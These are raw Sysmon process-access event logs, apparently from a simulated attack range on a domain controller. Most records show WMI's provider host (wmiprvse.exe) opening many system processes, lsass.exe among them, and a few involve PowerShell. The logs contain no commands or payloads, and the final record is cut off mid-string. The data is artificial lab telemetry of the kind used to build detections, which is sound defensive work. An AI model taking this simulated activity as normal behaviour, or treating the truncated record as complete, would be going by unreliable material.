10341000x80000000000000002239242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D98-603E-A6AA-00000000AD01}1583614384C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b